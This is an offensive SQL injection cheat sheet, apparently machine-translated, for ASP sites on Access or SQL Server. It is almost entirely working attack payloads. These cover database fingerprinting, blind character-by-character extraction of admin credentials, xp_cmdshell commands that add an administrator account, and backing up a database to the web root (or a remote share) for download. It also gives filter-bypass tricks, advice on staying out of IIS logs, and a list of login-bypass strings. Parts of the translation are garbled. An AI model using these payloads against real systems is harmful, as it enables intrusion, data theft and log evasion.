SQL Injection Experience Summary

Determine the database type by the engine that connects to the database:

Access:microsoft JET Database Engine

Sqlserver:microsoft OLE DB Provider for SQL Server

SQL injection will not succeed if you add a statement such as CInt (parameter) to the program, but the server will also give an error.

Some programmers only filter single quotation marks, so only single quotes test, is not the injection point, can be tested with the following statement:

http://www.mytest.com/showdetail.asp?id=49, and 1=1
http://www.mytest.com/showdetail.asp?id=49, and 1=2

ASP is typically paired with access and Sqlsever.

SQL Server has some system variables that can be obtained directly from the error message if it is not turned off by the servers IIS prompt , and if it returns an error prompt , the method is as follows:

http://www.mytest.com/showdetail.asp?id=49, and User>0

User is a built-in variable for SQL Server whose value is currently connected with the user name, type nvarchar. Take a nvarchar value compared with the number of int 0, the system will first try to convert the value of nvarchar to int, of course, the process will certainly go wrong.

In the case of a normal user, the error message for SQL Server is that a syntax error occurred while converting the nvarchar value "BT" to a column with the data type int, and if the SA user, the prompt is: An error occurred in the column converting "dbo" to int.

When server IIS does not allow the return of an error prompt, determine the database type:

Both access and SQL Server have their own system tables, such as tables that hold all the objects in the database, access is in the system table [msysobjects], but reading the table in the Web environment prompts "No permissions" and SQL Server is in the table [ Sysobjects], can be read normally in a Web environment.

Use the following statement in case you confirm that you can inject:

http://www.mytest.com/showdetail.asp?id=49; and (select COUNT (*) from sysobjects) >0

http://www.mytest.com/showdetail.asp?id=49; and (select COUNT (*) from msysobjects) >0

If the database is SQL Server, then the first URL of the page and the original page http://www.mytest.com/showdetail.asp?id=49 is roughly the same, and the second URL, because the table msysobjects is not found, will prompt an error, Even if the program has fault-tolerant processing, the page is completely different from the original page.

If the database is access, then the situation is different, the first URL of the page and the original page, the second URL depends on whether the database settings are allowed to read the system table, generally not allowed, so it is completely different from the original URL.

In most cases, the first URL will tell you the type of database used by the system (the first to return to the original page is SQL Server, and vice versa, access), and the second URL only serves as validation when the IIS error prompt is turned on.

According to the type of injection parameter, the original of the reconstructed SQL statement, according to the parameter type is divided into the following three kinds:

id=49, the parameters of this type of injection are numeric, and the SQL statements are roughly as follows:

SELECT * from table name where field =49

the injected parameter is id=49 and [query condition] , which is the build statement :

SELECT * from table name where field =49 and [query statement]

Class= series, this type of injected parameter is the character type:

SELECT * from table name where field = ' soap opera '

injected parameters for class= series ' and [query conditions] and ' ' = ' , which is the build statement :

SELECT * from table name where field = ' Serial ' and [query condition] and ' ' = '

Search without worrying about parameters, such as keyword= keywords:

SELECT * from table name where field like '% keyword% '

The injected parameter is keyword= ' and [query condition] and '%25 ' = ', which is the generated statement:

SELECT * from table name where field like '% ' and [query condition] and '% ' = '% '

Manually guess the table name, field name, field value:

Then replace the query condition with the SQL statement, and guess the table name , such as:

id=49 and (select Count (*) from Admin) >=0

If the page is the same as the id=49, the condition is established, that is, the table admin exists, and the other does not exist.

Guess the name of the table and then guess the name of the field, such as:

id=49 and (select Count (field name) from Admin) >=0

Guess the field name and then guess the field value , one of the most commonly used methods-ascii verbatim decoding method, although very slow, but certainly feasible:

Assumption: The username field exists in the known admin

First, take the first record and test the length of the username :

id=49; and (select top 1 len (username) from Admin) >0

If the length is greater than 0, the condition is set. Replace the last number until you guess the username field of the first record is worth the length

After you get the length of the field value, guess the field value by bit:

Id=49 and (select top 1 ASC (Mid (username,1,1)) from Admin) >0

The ASCII code of the first character is greater than 0, and the range is between 1-128.

SQL injection Common functions:

ACCESS:ASC (character) Sqlserver:unicode (character) function: Returns the ASCII code of a character

ACCESS:CHR (number) Sqlserver:nchar (digital) Effect: In contrast to ASC, returns characters based on ASCII code

Access:mid (String, n,l) sqlserver:substring (string, n,l) function: Returns the string from n characters to the length of L, that is, the string between N and N+l

ACCESS:ABC (number) SQLSERVER:ABC (number) Effect: Returns the absolute value of a number (used when guessing Chinese characters)

Access:a between B and C sqlserver:a between B and C function: Judging whether A is bounded between B and C

Chinese processing methods:

Access: Chinese ASCII code may appear negative, after removing the negative number with ABS () absolute value, Chinese characters are unchanged.

SQL Server: ASCII for Chinese is positive, but because it is Unicode double-digit encoding, ASCII code cannot be obtained with function ASCII (), Unicode values must be returned with function Unicode (), and the corresponding Chinese characters are obtained with the nchar function.

Inject SQL Server database with system tables:

Http://Site/url.asp?id=1;exec Master. xp_cmdshell "NET user name Passwd/add"--

Http://Site/url.asp?id=1;exec Master. xp_cmdshell "net localgroup Administrators Name/add"--

This method only applies when connecting to the database with SA, otherwise there is no permission to call xp_cmdshell .

http://Site/url.asp?id=1; and db_name () >0 returns the database name of the connection

http://Site/url.asp?id=1; Backup database name to disk= ' c:inetpubwwwroot1.db ';--

Get the database name, plus some absolute paths that the IIS error exposes, back up the database to the Web directory, and then complete the full download of the database with HTTP. When you do not know the absolute path, you can also back up to the network address method (such as 202.96.xx.xx/share/1.db), but the success rate is not high.

http://Site/url.asp?id=1; and (select top 1 name from sysobjects where xtype= ' U ' and status>0) >0

Sysobjects is a system table for SQL Server that stores all table names, views, constraints, and other objects, xtype= ' U ' and status>0, which represents the table name created by the user, which takes the first name out of the table, compares the size with 0, and lets the error message The table name is exposed, the second to third ... A table name can also be burst out in this way.

http://Site/url.asp?id=1; and (select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0

After getting the table name, use OBJECT_ID (' table name ') to get the table name corresponding to the internal id,col_name (table name id,1) represents the 1th field name of the table, change 1 to 2,3,4 ... you can get the name of the field in the table of the Solver one by one.

To bypass program restrictions to continue injection:

The purpose of bypassing the program limit is achieved by using the correlation function.

Filter ' (single quote):

such as where xtype= ' U ', the ASCII code corresponding to the character U is 85, so you can use where Xtype=char (85) Instead, if the character is in Chinese, such as where name= ' user ', you can use where Name=nchar (29992) +nchar (25143) instead.

Experience Summary:

1. Filter is not case-sensitive: Write tests with mixed-case, such as SeLecT

2. The field name is guessed by the login form on the website, and the field name is usually the same as the form's input box for convenience.

3. The + number of the address bar is interpreted as a space after the procedure,%2b interpreted as the + number,%25 interpreted as the% number

4. When injected with the Get method, IIS logs all committed strings and does not log the Post method, so it can use the post URL as much as possible without get.

5. Guess access can only use ASCII verbatim decoding method, SQL Server can also use this method, only need to pay attention to the difference between the two, but if you can use SQL Server error information to expose the value, the efficiency and accuracy will be greatly improved.

Universal Password-bypass authentication:

1: "or" a "=" a

2: ') or (' a ' = ' a

3:or 1=1--

4: ' or 1=1--

5:a ' or ' 1=1--

6: "or 1=1--

7: ' or ' a ' = ' a

8: "or" = "a ' = ' a"

9: ' or ' = '

Ten: ' or ' = ' or '

11:1 or ' 1 ' = ' 1 ' =1

12:1 or ' 1 ' = ' 1 ' or 1=1

: ' OR 1=1%00

: "or 1=1%00

SQL Injection Experience Summary